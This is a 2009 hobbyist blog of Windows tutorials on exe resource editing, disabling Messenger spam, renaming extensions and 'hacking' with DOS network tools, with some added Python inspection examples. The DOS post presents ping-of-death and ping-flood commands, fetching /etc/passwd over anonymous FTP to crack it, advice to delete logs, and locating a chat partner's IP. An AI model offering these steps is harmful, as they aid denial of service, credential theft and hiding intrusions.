Monday, 30 March 2009

How to modify *.exe files

Learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a program by editing its source in a disassembler. Why?
Because that's for programmers and assembly experts only.

If you try to view it in hex you'll only get tons of bytes you don't understand.
First off, you need Resource Hacker (latest version). It's a resource editor,
very easy to use. You can download it at http://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too.


3) You will see that the interface is simple and clean. Go to the menu File > Open or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) On the left side of the screen a list of sections will appear.
The most common sections are
-Icon;
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can view and change the icon(s) of the program by double-clicking the Icon section, choosing the icon, right-clicking on it and pressing "Replace Resource". After that you can choose the icon you want to replace the original with.
*String table: the program's text strings, indexed by ID; useful sometimes, basic programming knowledge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog: Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile Script" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the program easily!
*WAV: Change the sounds in the program with your own.


5) In the RCData, Dialog, Menu and String table sections you can make a lot of changes. You can modify or translate the text, change links, change buttons, etc.


TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save your work via File > Save (or Save As).
TIP: When you save a file, the original file is backed up by default and renamed to Name_original, and the saved file gets the normal name of the changed program.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means Resource Hacker can't modify it because of its structure; the file is packed (UPX and similar) and would have to be unpacked first.
TIP: Editing resources changes the file's bytes, so if the program was digitally signed (Authenticode) the signature will no longer verify after you save; Windows and antivirus software may then treat the modified file as unsigned or tampered with.
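Two things worth checking before opening a file in Resource Hacker: whether it is Authenticode-signed (any resource edit invalidates the signature) and whether it looks packed (the "non-standard resource layout" message above). The following Python is an added example, not part of the original tutorial: it parses the PE header's data directories and section table to answer both questions. The header built by build_sample_pe() is constructed for this example and is not a loadable executable, and the UPX section-name check is only a heuristic.

```python
"""Check a PE file's resource directory, Authenticode directory and section
names before editing its resources.  Added example, not from the original
tutorial; the sample PE header below is constructed, not a real executable."""
import struct
from typing import Dict, List, Tuple

# Data-directory indices from the PE/COFF specification.
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # Authenticode certificate table
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def parse_pe(data: bytes) -> Dict[str, object]:
    """Return the data directories and section names of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    size_opt, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20                       # optional header follows the 20-byte COFF header
    magic, = struct.unpack_from("<H", data, opt)
    if magic == PE32_MAGIC:
        nrva_off, dd_off = opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:
        nrva_off, dd_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    nrva, = struct.unpack_from("<I", data, nrva_off)
    dirs: List[Tuple[int, int]] = [
        struct.unpack_from("<II", data, dd_off + 8 * i) for i in range(min(nrva, 16))
    ]
    sect = opt + size_opt                 # section table follows the optional header
    names = [data[sect + 40 * i: sect + 40 * i + 8].rstrip(b"\0") for i in range(num_sections)]
    return {"magic": magic, "dirs": dirs, "sections": names}


def resource_edit_notes(data: bytes) -> Dict[str, object]:
    """What a resource editor such as Resource Hacker will run into."""
    info = parse_pe(data)
    dirs = info["dirs"]
    res = dirs[IMAGE_DIRECTORY_ENTRY_RESOURCE] if len(dirs) > IMAGE_DIRECTORY_ENTRY_RESOURCE else (0, 0)
    sec = dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] if len(dirs) > IMAGE_DIRECTORY_ENTRY_SECURITY else (0, 0)
    return {
        "has_resources": res[1] != 0,
        "resource_rva": res[0],
        # Non-empty certificate table: the file is Authenticode-signed, and any
        # change to the resource bytes invalidates that signature.
        "signed": sec[1] != 0,
        # Heuristic only: UPX names its sections UPX0/UPX1.  A packed file is
        # what triggers the "non-standard resource layout" message.
        "packer_hint": any(n.startswith(b"UPX") for n in info["sections"]),
        "sections": info["sections"],
    }


def build_sample_pe(signed: bool, section_names=(b".text", b".rsrc")) -> bytes:
    """Constructed minimal PE32 header for this example (not a loadable image)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)            # e_lfanew: PE header right after
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 224, 0x102)
    opt = bytearray(96)                               # PE32 fields before the directories
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)               # NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_RESOURCE] = (0x3000, 0x800)
    if signed:
        dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (0x5000, 0x1200)  # file offset, size
    dd = b"".join(struct.pack("<II", *d) for d in dirs)
    sections = b"".join(n.ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + dd + sections


if __name__ == "__main__":
    print(resource_edit_notes(build_sample_pe(signed=True)))
```

To check a real file, call resource_edit_notes(open(path, "rb").read()). The certificate-table entry is a file offset rather than an RVA, which is why the parser keeps the raw pair instead of translating it; a "signed" result tells you the saved copy will fail signature verification, not that the edit itself will fail.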


How To Stop Spam


HOW TO STOP SPAM VIA WINDOWS MESSENGER SERVICE
Below you'll find many ways (sorted with the most successful first) to stop the Windows Messenger service. Depending on your system environment, some may require more than one step. This service is available only on NT, 2K, XP & Server 2003. Administrator login is REQUIRED.

About The Messenger Service


* Messenger is a Windows Service that runs in the background
* Messenger is not the same as MSN Messenger or any other Instant Messaging Program
* Messenger does not facilitate two-way chatting
* Many Windows programs, firewalls, UPS and antivirus products use the Messenger service
* Antivirus and UPS software, among others, may not work if Messenger is disabled
* The Messenger Service is usually turned on by default in most Windows NT, 2K and XP systems


1. Manually

1. Example 1

1. Click Start, Run and enter the following command:
RunDll32 advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove
NOTE: After Messenger is removed, Outlook Express may take a long time to open if you have the Contacts pane enabled
2. To prevent this, click Start, Run and enter regedit. Go to:
HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express
3. Right-click in the right pane and select New, DWORD Value
4. Give it the name Hide Messenger. Double-click this new entry and set the value to 2
5. End result should look EXACTLY like this:
System Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express]
Value Name: Hide Messenger
Data Type: REG_DWORD (DWORD Value)
Value Data: 2 (2 = remove messenger)

2. Example 2

1. Copy and paste the following into the Run box in the Start Menu:
RunDll32.exe advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove

3. Example 3

1. If Example 5 didn't work, then try this - many users miss it or don't know of it
2. Click on Start then go to RUN and type:
C:\WINDOWS\inf\sysoc.inf
3. Change:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
4. To:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7
5. Then use Add/Remove Windows Components to remove Messenger
NOTE: You can also prevent access to Windows Messenger using Group Policy or the Set Program Access and Defaults utility added by default in Windows XP SP1 and Windows 2000 SP3




4. Example 4

1. Open Windows Messenger
2. From the menu, select "Tools" then "Options" then "Preferences" tab
3. Uncheck "Run this program when Windows starts"
4. Open Outlook Express
5. From the menu, select "Tools" then "Options" then "General" tab
6. Uncheck the option to "Automatically log on", if it's there
7. Also in Outlook Express, select "View" then "Layout"
8. Uncheck the option to "display Contacts" - if you don't, the program will open a connection and display a list of all Contacts online
9. In "Startup Folder" make sure there is no entry there for Messenger
10. Open Norton Anti-Virus if you have it installed
11. Click "Options" then "Instant Messenger"
12. Uncheck "Windows Messenger (recommended)"
NOTE: This list ought to disassociate MSN Messenger from Outlook Express, so that it only starts up if you really want it to

5. Example 5

1. Windows 2000

* Click Start-> Settings-> Control Panel-> Administrative Tools->Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

2. XP Home

* Click Start->Settings ->Control Panel
* Click Performance and Maintenance
* Click Administrative Tools
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

3. XP Professional

* Click Start->Settings ->Control Panel
* Click Administrative Tools
* Click Services
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties.
* Click the STOP button.
* Select Disable in the Startup Type scroll bar
* Click OK

4. Windows NT

* Click Start ->Control Panel
* Double Click Administrative Tools
* Select Services-> Double-click on Messenger
* In the Messenger Properties window, select Stop
* Then choose Disable as the Startup Type
* Click OK
NOTE: If you stop the service and don't adjust the startup type, the Messenger service will start automatically the next time you reboot. Keep in mind that when you disable the Messenger service, you'll no longer receive messages about an attached UPS, and you won't be notified of print job completion, performance alerts, or antivirus activity (the notifications Windows itself sends, not those of the program you're using for those purposes).

6. Example 6

1. To disable receipt of messenger pop-ups, verify that your firewall blocks inbound traffic on UDP ports 135, 137, and 138, and TCP ports 135 and 139. On a system connected directly to the Internet, you should also block inbound traffic on TCP port 445. If the system you want to protect is part of a Win2K-based network with Active Directory (AD), don't block incoming traffic on port 445 - Microsoft Knowledge Base Article 330904
Code:
http://support.microsoft.com/default.aspx?scid=kb;en-us;330904

NOTE: You can use the firewall approach only if your system doesn't communicate with legacy systems that rely on NetBIOS name resolution to locate machines and shared resources. If, for example, you let users running Windows 9x share your printer or scanner, when you disable inbound NetBIOS traffic, users won't be able to connect to these shared resources. Regardless of the method you choose, you can stop messenger spam

2. Program

1. Example 1

NOTE: On Oct 15, 2003, Microsoft released Critical Security Bulletin MS03-043 warning users that the Windows Messenger Service, running and exposed by default in all versions of Windows NT, 2000 and XP, contains a "Remote Code Execution" vulnerability that allows any Windows machine not otherwise secured and protected to be taken over and remotely compromised over the Internet
1. Shoot the Messenger
Code:
http://grc.com/files/shootthemessenger.exe


2. Example 2

1. Messenger Disable
Code:
http://www.dougknox.com/xp/utils/MessengerDisable.zip

NOTE: If you choose to uninstall Windows Messenger on a system with SP1 installed, you will receive an error message about "un-registering" an OCX file. This is normal, and does not affect the removal process. Windows Messenger will still be removed

3. TEST

1. Example 1

1. Right-click "My Computer"
2. Select "Manage"
3. Under "System Tools" right-click on "Shared Folders"
4. Choose "All Tasks" and select "Send Console Message..."
5. If you receive the following error message then the service has been disabled; otherwise confirm that you have disabled it or try another example
"The following error occurred while reading the list of sessions from Windows clients:
Error 2114: The Server service is not started."

2. Example 2

1. Click Start then "Run"
2. Type in {cmd.exe}
3. Type in net send 127.0.0.1 hi
4. If you get a popup "hi" message, the service is still running: confirm that you have disabled it or try another example

4. IF YOU INSIST

1. If you insist on keeping Windows Messenger, then I'd recommend Messenger Manager - "Allows you to keep your messenger service running, as is intended and needed by Windows. This ensures that vital system errors and notifications may be sent informing you of Important System Events"
Code:
http://www.sellertools.com/default.asp?i=MessageManager3.htm

2. However, as a replacement for Windows Messenger's remote control feature, I'd recommend this free tool, Virtual Network Computing - "It is a remote control software which allows you to view and interact with one computer (the "server") using a simple program (the "viewer") on another computer anywhere on the Internet. The two computers don't even have to be the same type, so for example you can use VNC to view an office Linux machine on your Windows PC at home"
Code:
http://www.realvnc.com/download.html



RESULTS WILL VARY
No matter how good your systems may be, they're only as effective as what you put into them.

How to Rename File Extensions



A lot of people here may ask how to rename a file extension in Windows; well, it's very simple and takes little of your time. There are two ways to rename a file extension without any third-party program.



Number 1, Folder Options:



Go into your Control Panel; in my case I use Windows XP, so I would press [Start, then Control Panel]. Once you're in Control Panel, open "Folder Options", click the View tab and make sure "Hide file extensions for known file types" is not selected, then press OK.



Now go into a folder and notice you can see your files extensions, rename them to whatever you'd like, for instance:



Code:

Dildos.exe to Dildos.Anonymous / Etc,Etc,Etc







Number 2, MS-DOS:



The advantage of renaming files in DOS is that you can rename multiple files rather than one at a time, which saves time. Here I'll provide a few examples.



Go to your Start menu, open Run, then type "cmd" without the quotes. You're now at the MS-DOS prompt. Find the directory that has your files and type:



Example



cd C:\Files\





In your case "C:\Files\" may not exist, so type in the directory that has your files. If everything goes well, DOS will look something like this:



Code:

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:\Documents and Settings\User>cd C:\Files\





If it fails, you perhaps didn't type the correct folder name and it will look like this:









Code:

C:\Documents and Settings\User>cd C:\Filse\

The system cannot find the path specified.







Once you're in the directory, type dir and you will be shown the files in your folder, including their extensions. In my case:



Code:

C:\Files>dir

Volume in drive C has no label.

Volume Serial Number is CXXX-XXXX



Directory of C:\Files



02/01/2005 07:22 PM .

02/01/2005 07:22 PM ..

01/31/2005 06:40 PM 14,336 stf.bmp

01/31/2005 06:40 PM 14,336 stf02.bmp

2 File(s) 28,672 bytes

2 Dir(s) 39,024,766,976 bytes free



C:\Files>





Did you notice how I had two files named stf? Since both of these files have the same extension, *.bmp, they can be renamed all together. If there are other files in there with the same extension that you don't want to rename, move them to another folder first.



Last but not least, type:



Code:

C:\Files>ren *.bmp *.rar





And your results are:

Code:



C:\Files>dir

Volume in drive C has no label.

Volume Serial Number is CXXX-XXXX



Directory of C:\Files



02/01/2005 07:37 PM .

02/01/2005 07:37 PM ..

01/31/2005 06:40 PM 14,336 stf.rar

01/31/2005 06:40 PM 14,336 stf02.rar

2 File(s) 28,672 bytes

2 Dir(s) 39,024,676,864 bytes free



C:\Files>
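One caveat worth knowing: renaming stf.bmp to stf.rar changes nothing inside the file, so the result is still a bitmap with a misleading name. Anything that trusts the extension (Explorer, a naive upload filter) is fooled; anything that reads the first bytes is not, which is also how a disguised executable (an .exe renamed to .txt) gets caught. The following Python is an added example, not part of the original post; the signature table and the sample "files" are constructed here.

```python
"""Identify a file by its leading bytes instead of trusting its extension.
Added example, not from the original post; the signature table and the sample
files are constructed for this demonstration."""
import os
from typing import Dict, FrozenSet, List, Optional, Tuple

# (magic bytes at offset 0, content kind, extensions that legitimately carry it)
SIGNATURES: List[Tuple[bytes, str, FrozenSet[str]]] = [
    (b"MZ", "pe", frozenset({"exe", "dll", "scr", "ocx", "cpl", "sys"})),
    (b"BM", "bmp", frozenset({"bmp", "dib"})),
    (b"Rar!\x1a\x07", "rar", frozenset({"rar"})),
    (b"PK\x03\x04", "zip", frozenset({"zip", "jar", "docx", "xlsx", "apk"})),
    (b"\x89PNG\r\n\x1a\n", "png", frozenset({"png"})),
    (b"%PDF-", "pdf", frozenset({"pdf"})),
]


def sniff(data: bytes) -> Optional[str]:
    """Return the content kind for the first matching signature, else None."""
    for magic, kind, _ in SIGNATURES:
        if data.startswith(magic):
            return kind
    return None


def extension_of(name: str) -> str:
    return os.path.splitext(name)[1].lstrip(".").lower()


def check_file(name: str, data: bytes) -> Dict[str, object]:
    """Report whether the extension agrees with what the bytes say the file is."""
    ext = extension_of(name)
    kind = sniff(data)
    allowed = next((exts for _, k, exts in SIGNATURES if k == kind), frozenset())
    return {
        "name": name,
        "ext": ext,
        "content": kind,
        # Unknown content is not flagged: the table only knows a few formats.
        "mismatch": kind is not None and ext not in allowed,
    }


def scan(files: Dict[str, bytes]) -> List[str]:
    """Names whose extension contradicts their content."""
    return [n for n, d in files.items() if check_file(n, d)["mismatch"]]


# Constructed sample "files": a BMP renamed to .rar as in the tutorial, a PE
# disguised as a text file, an honest PNG, and plain text the table cannot classify.
SAMPLE_FILES: Dict[str, bytes] = {
    "stf.rar": b"BM" + bytes(12),
    "readme.txt": b"MZ\x90\x00" + bytes(60),
    "logo.png": b"\x89PNG\r\n\x1a\n" + bytes(8),
    "notes.md": b"# just text\n",
}

if __name__ == "__main__":
    for name, data in SAMPLE_FILES.items():
        print(check_file(name, data))
    print("mismatched:", scan(SAMPLE_FILES))
```

To run it over a real directory, build the dict from the first 16 bytes of each file (open(path, "rb").read(16)); the functions never need more than the signature prefix.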





Sunday, 29 March 2009

Hacking Using DOS

Microsoft DOS comes with a few hidden hacking tools that I'll discuss here. These tools can be found in the c:\windows directory if you use Win98, and in system32 under your Windows directory (e.g. C:\winxp\system32) if you use WinXP. WinXP, Win2000 and WinNT ship with several extra Internet tools, so if you're still using Win98 I suggest replacing it with WinXP, which has extra security features and good Internet hacking commands. In this manual I'll cover several commands found on Win98 and WinXP.

So, for Windows users, here are the hacking commands in DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, here's the explanation.

1. ping

This utility is used to check whether a remote host is up. It sends an ICMP echo request to the remote host, and if the host replies, there is indeed a machine there.

Try typing this command:

C:\windows>ping /?

*************
Newbie tip: typing '/?' after a DOS command shows its help. That's how you learn the various DOS commands. WinXP, WinNT and Win2000 also have a 'help' command that lists all the DOS commands.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.



So I can ping any IP address or domain name to check whether it's up on the Internet. For example, if I type "ping localhost" I get:


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms



************
Newbie tip: 'localhost' is IP 127.0.0.1 and is our own IP address, also known as the loopback IP. But when you connect to the Internet you're given a new IP by your ISP that identifies you. You can find out your IP by typing "winipcfg" in Start-Run on Win98; everyone else just types "ipconfig" at the command prompt.
***********

This shows me that 32 bytes of data were sent to 127.0.0.1 and replied to in under 10 ms. TTL is Time To Live and ranges from 0 to 255 (default 128). Now let's see what happens if I type "ping www.yahoo.com":

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms



But how is ping used by hackers? Well, there are two deadly options, '-l' and '-t'. -l sets the size of the send buffer (default 32 bytes). What if I type "ping -l 65600 target.com"? That asks for a 65600-byte packet to target.com, larger than the 65535-byte maximum of an IP datagram. On vulnerable systems this makes target.com hang and need a restart.

And if I type "ping -t target.com" it keeps sending 32 bytes of data to target.com until its resources are exhausted and it hangs. These two attacks are known as ping attacks, a form of DoS.

***********
Newbie tip: the 'DoS' just mentioned is Denial of Service, launched by hackers to stop a service on a remote machine.
***********
Note: this type of attack was common in the past, but on current, patched systems it no longer works. Current Windows versions of ping also refuse -l values above 65500, so the command as written is rejected before anything is sent.

2. Tracert

The tracert command traces the route to a remote machine. Before our request reaches the remote machine it passes through several routers in between. The tracert tool (known as 'traceroute' on Unix) was originally designed to find which router is having problems. It shows the IP addresses of the routers our request passes through before reaching the remote machine. For example, if I type "tracert www.yahoo.com" at the DOS prompt I get:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.

The first line tells us which IP is being traced and then the maximum number of hops. The number of hops depends on how many servers are in between. After tracing starts, my request first goes through sify.net (my ISP's server), then through various other servers, and finally reaches w8.scd.yahoo.com. So we can see how long the procedure is. Whenever you open www.yahoo.com in a web browser, your request always goes through your ISP first (to get the IP of www.yahoo.com from its domain name list), then the other servers along the path, and finally yahoo.

So how is tracert used by hackers? It is used to find firewalls and get past them. tracert used together with nmap can find the real IP where the firewall sits, which the hacker then tries to defeat. In the example above, the hops that show "Request timed out" are routers that don't answer our probes, which is typically because a firewall drops them; the final hop w8.scd.yahoo.com [66.218.71.87] is the address the name resolved to. Firewalls will be covered in a separate article.


3. Telnet

If you use Windows then 'telnet' is the greatest hacking tool for you. It's actually a terminal that can access a remote machine and use its services. Through telnet you can set up a connection between your machine and a remote machine on a particular port.


***********
Newbie tip: here I'm talking about virtual ports, not the physical ones you see on the back of your computer. Just as a physical port is used to connect hardware, a virtual port is used to connect software. TCP/IP has 65,535 virtual ports.
***********
If you type "telnet target.com" you connect to target.com on port 23 (the port running the telnet service). You can also connect to another port by typing the port number after target.com. For example, if I want to connect to port 25 (SMTP service) I type "telnet target.com 25".
***********
Newbie tip: each port runs a particular service. To get a list of which service runs on which port, open "C:\windows\services" in Notepad (on NT-based Windows the file is %SystemRoot%\system32\drivers\etc\services).
***********
Once you're connected to a remote machine on a given port, a telnet window pops up with the daemon running on that port waiting for you to type commands. For example, "telnet www.cyberspace.org" gives me a login prompt (the original article showed a screenshot here).




I have to log in there and type a password, and I get a Linux shell prompt. If you type newuser there you get a login ID and password. After that I'm ready to execute commands remotely.

Well, www.cyberspace.org has a Linux server. So if you're not familiar with Linux you won't be able to use its services.



4. FTP

FTP is File Transfer Protocol. Through it you can download or upload files. And what does a hacker want from this? Right!! Just type "ftp target.com" and the daemon banner is displayed. But here, in order to transfer files, you first have to log in. Some sites allow anonymous login, for example login "anonymous" with your email address as the password. Of course you'd type a fake email. Now you can start downloading and uploading files. But for that you need the commands. At the FTP prompt you can type "?" and it shows the following:


! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

To get help on a particular command, for example delete, type "? delete". Some other important commands are:

1. 'pwd' to know the present directory at remote machine.
e.g. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
e.g. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
e.g. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
e.g. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
e.g. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
e.g. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

For other ftp commands see their help.

Now suppose the FTP port (port 21) is open on www.nosecurity.com. A hacker would connect to that site using "ftp www.nosecurity.com" at the DOS prompt, then try to log in anonymously. Assuming www.nosecurity.com runs a Linux server, the hacker would type "get /etc/passwd" to fetch the password file and crack it. (A properly configured FTP server confines anonymous users to their own directory tree, so this only works against a misconfigured host.) If you're a hacker, don't forget to delete the logs.



5. netstat

You can set up a connection with a remote machine on a particular port only when that port is open on the remote machine. For example, if you want to set up a connection with www.target.com on port 23 (telnet) then that port must be open on www.target.com. And all hacking activity generally uses open ports. Typing "netstat /?" at the DOS prompt gives:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

The options explain their own functions. The most important are -a and -n. The -a option shows all open ports on the machine. And if I use -n it shows IP addresses instead of domain names. I get the following if I type "netstat -a" at the command prompt:


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 lan-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

"Proto" gives the protocol name, "Local Address" gives our IP address and the open port. "Foreign Address" gives the IP address and port number connected to us. "State" gives the current state: whether a connection is "established", listening, or just "waiting".

For example, if I open www.yahoo.com and then run "netstat -a" I get an entry like this:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

My computer with IP 203.43.50.81 is connected through port 2034 to yahoo on port 80


*************
Newbie tip: this way you can get the IP of someone chatting with you. First run "netstat -an" and look under the foreign addresses. Now start a private chat with the other person. Run "netstat -an" again and you'll find one more foreign IP at the end. That's the person's IP. This only works when the chat program connects the two of you directly; if messages are relayed through the service's server, the new entry is the server's IP, not the other person's.
*************
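The netstat output above is easy to parse mechanically, and the chat tip boils down to diffing two snapshots. The following Python is an added example, not part of the original article: the two snapshots are constructed in the netstat -an layout (documentation-range addresses, the 203.43.50.81 local address from the text), and the functions return the listening ports, the established peers, and whichever peer appeared between the two runs.

```python
"""Parse `netstat -an`-style output: listening ports, established peers, and a
diff of two snapshots (the "find the other person's IP" tip).  Added example,
not from the original article; the sample output below is constructed."""
from typing import List, NamedTuple, Set, Tuple


class Conn(NamedTuple):
    proto: str
    local_host: str
    local_port: str
    foreign_host: str
    foreign_port: str
    state: str


def split_endpoint(endpoint: str) -> Tuple[str, str]:
    """'host:port' -> (host, port); rpartition copes with IPv6 literals."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def parse_netstat(text: str) -> List[Conn]:
    """Turn the table into Conn records, skipping headers and blank lines."""
    conns: List[Conn] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        state = parts[3] if len(parts) > 3 else ""   # UDP rows carry no state
        lh, lp = split_endpoint(parts[1])
        fh, fp = split_endpoint(parts[2])
        conns.append(Conn(parts[0], lh, lp, fh, fp, state))
    return conns


def listening_ports(conns: List[Conn]) -> List[str]:
    """Local TCP ports in LISTENING state, numeric ones first and in order."""
    ports = {c.local_port for c in conns if c.state == "LISTENING"}
    return sorted(ports, key=lambda p: (not p.isdigit(), int(p) if p.isdigit() else p))


def established_peers(conns: List[Conn]) -> Set[Tuple[str, str]]:
    return {(c.foreign_host, c.foreign_port) for c in conns if c.state == "ESTABLISHED"}


def new_peers(before: str, after: str) -> Set[Tuple[str, str]]:
    """Peers present in the second snapshot but not the first."""
    return established_peers(parse_netstat(after)) - established_peers(parse_netstat(before))


# Constructed snapshots in netstat -an layout (RFC 5737 documentation addresses).
SNAPSHOT_BEFORE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1027           0.0.0.0:0              LISTENING
  TCP    203.43.50.81:1285      192.0.2.10:80          ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""
SNAPSHOT_AFTER = SNAPSHOT_BEFORE + "  TCP    203.43.50.81:2034      198.51.100.7:1863      ESTABLISHED\n"

if __name__ == "__main__":
    conns = parse_netstat(SNAPSHOT_BEFORE)
    print("listening:", listening_ports(conns))
    print("peers:", established_peers(conns))
    print("appeared after chat started:", new_peers(SNAPSHOT_BEFORE, SNAPSHOT_AFTER))
```

Feed it live output with parse_netstat(subprocess.check_output(["netstat", "-an"], text=True)); -n matters because without it the hostname lookups make the two snapshots slow and inconsistent.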



